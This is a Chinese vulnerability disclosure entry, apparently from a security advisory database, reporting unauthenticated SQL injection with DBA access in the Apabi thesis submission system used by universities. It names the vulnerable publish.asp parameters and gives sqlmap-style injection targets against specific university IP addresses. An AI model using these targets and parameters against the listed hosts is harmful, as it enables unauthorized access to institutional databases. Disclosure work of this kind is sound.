某高校在用系统sql注入(打包)(DBA)(无需登录)

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

### 简要描述: 1 ### 详细说明: 案例较多,给CNCERT ### 漏洞证明: Apabi论文授权提交系统 版权所有© 北京方正阿帕比技术有限公司 谷歌搜索:论文授权提交系统 北京大学复旦大学什么的都在其中~ [<img src="https://images.seebug.org/upload/201503/10204100acb06035995d1b51d7850b163d871611.png" alt="060814241c327099951e4c60760c02105295ae87.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/10204100acb06035995d1b51d7850b163d871611.png) 漏洞文件publish.asp 里的txtStuName,txtStuNo,cboCollege,cboSubjectClass,txtMajor,inputStartDate,inputEndDate 案例 210.44.126.14/tasi/admin/publish/publish.asp?action=querylist --data "txtStuName=ww&txtStuNo=&cboCollege=&cboDegreeType=0&cboSubjectClass=&cboSubject=&txtMajor=&inputStartDate=&inputEndDate=&publish=-1&public=-1" -p "txtStuName,txtStuNo,cboCollege,,cboSubjectClass,cboSubject,txtMajor,inputStartDate,inputEndDate" 202.195.243.37/tasi/admin/publish/publish.asp?action=querylist --data...

0%

漏洞利用/PoC

暂无可用Exp或PoC

受影响的平台与产品

当前有0条受影响产品信息